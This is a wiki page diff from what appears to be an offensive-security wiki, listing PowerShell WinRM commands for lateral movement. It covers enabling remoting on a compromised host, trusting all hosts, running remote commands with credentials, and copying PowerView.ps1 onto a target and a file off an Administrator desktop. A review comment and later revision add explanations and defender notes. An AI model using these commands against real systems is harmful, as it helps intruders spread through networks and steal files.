(Created page with "category: Lateral Movement") |
No edit summary |
Line 1: | Line 1: | ||
== Commands<ref>https://www.ired.team/offensive-security/lateral-movement/t1028-winrm-for-lateral-movement</ref> == | |||
[[category: Lateral Movement]] | [[category: Lateral Movement]] | ||
<syntaxhighlight lang="powershell"> | |||
# Enable PowerShell Remoting on the target (box needs to be compromised first) | |||
Enable-PSRemoting -force | |||
# Check if a given system is listening on WinRM port | |||
Test-NetConnection <IP> -CommonTCPPort WINRM | |||
# Trust all hosts: | |||
Set-Item WSMan:\localhost\Client\TrustedHosts -Value * -Force | |||
# Check what hosts are trusted | |||
Get-Item WSMan:\localhost\Client\TrustedHosts | |||
# Execute command on remote host | |||
Invoke-Command <host> -Credential $cred -ScriptBlock {Hostname} | |||
# Interactive session with explicit credentials | |||
Enter-PSSession <host> -Credential <domain>\<user> | |||
# Interactive session using Kerberos: | |||
Enter-PSSession <host> -Authentication Kerberos | |||
# Upload file to remote session | |||
Copy-Item -Path C:\Temp\PowerView.ps1 -Destination C:\Temp\ -ToSession (Get-PSSession) | |||
# Download file from remote session | |||
Copy-Item -Path C:\Users\Administrator\Desktop\test.txt -Destination C:\Temp\ -FromSession (Get-PSSession) | |||
</syntaxhighlight> | |||
<references /> |
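Review bot: The `Set-Item WSMan:\localhost\Client\TrustedHosts -Value * -Force` line is only labelled "Trust all hosts", which understates what it does: TrustedHosts is a client-side list of hosts the WinRM client will authenticate to without Kerberos mutual authentication, and `*` removes that check entirely, so the client's credentials (NTLM/Basic) are sent to whatever answers at the given name or IP. The comment should say so and note that a specific host name, or `-Authentication Kerberos` inside a domain, avoids the wildcard, e.g. `# Trust all hosts: disables client-side host verification for non-Kerberos auth — prefer an explicit host name, or Kerberos (needs no TrustedHosts entry)`. The `Copy-Item ... (Get-PSSession)` lines also assume exactly one open session, since `-ToSession`/`-FromSession` take a single PSSession; that precondition is worth stating in the comment.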
Latest revision as of 23:05, 18 March 2023
Commands[1]
# Enable PowerShell Remoting on the target (box needs to be compromised first)
# Enable-PSRemoting starts the WinRM service, registers an HTTP listener (TCP 5985)
# and adds the matching firewall rule; -force suppresses the confirmation prompts.
# Defender note: this is a persistent configuration change and a detection point
# (service start, new listener and firewall rule are all logged on the host).
Enable-PSRemoting -force
# Check if a given system is listening on WinRM port
# <IP> is a placeholder. -CommonTCPPort WINRM probes TCP 5985 (HTTP); a host that only
# exposes WinRM over HTTPS (TCP 5986) will not answer this check — probe 5986 explicitly.
Test-NetConnection <IP> -CommonTCPPort WINRM
# Trust all hosts:
# TrustedHosts is a client-side list of hosts this machine will authenticate to without
# Kerberos mutual authentication. '*' removes that check entirely, so the client's
# credentials (NTLM/Basic) go to whatever answers at the target name or IP.
# Prefer an explicit host name, or use Kerberos (no TrustedHosts entry needed in a domain).
Set-Item WSMan:\localhost\Client\TrustedHosts -Value * -Force
# Check what hosts are trusted
Get-Item WSMan:\localhost\Client\TrustedHosts
# Execute command on remote host
# $cred is assumed to be a PSCredential created earlier (e.g. via Get-Credential) — not shown here.
# {Hostname} runs hostname.exe on the remote side; output is returned to the caller.
Invoke-Command <host> -Credential $cred -ScriptBlock {Hostname}
# Interactive session with explicit credentials
# Passing a bare user name to -Credential makes PowerShell prompt for the password.
Enter-PSSession <host> -Credential <domain>\<user>
# Interactive session using Kerberos:
# Requires a domain-joined client, a resolvable host name (not an IP) and a valid SPN;
# in exchange the server is mutually authenticated and no TrustedHosts entry is needed.
Enter-PSSession <host> -Authentication Kerberos
# Upload file to remote session
# Run from the local prompt, not inside Enter-PSSession. Assumes exactly one open PSSession:
# -ToSession/-FromSession take a single session, so Get-PSSession returning several will fail.
Copy-Item -Path C:\Temp\PowerView.ps1 -Destination C:\Temp\ -ToSession (Get-PSSession)
# Download file from remote session
Copy-Item -Path C:\Users\Administrator\Desktop\test.txt -Destination C:\Temp\ -FromSession (Get-PSSession)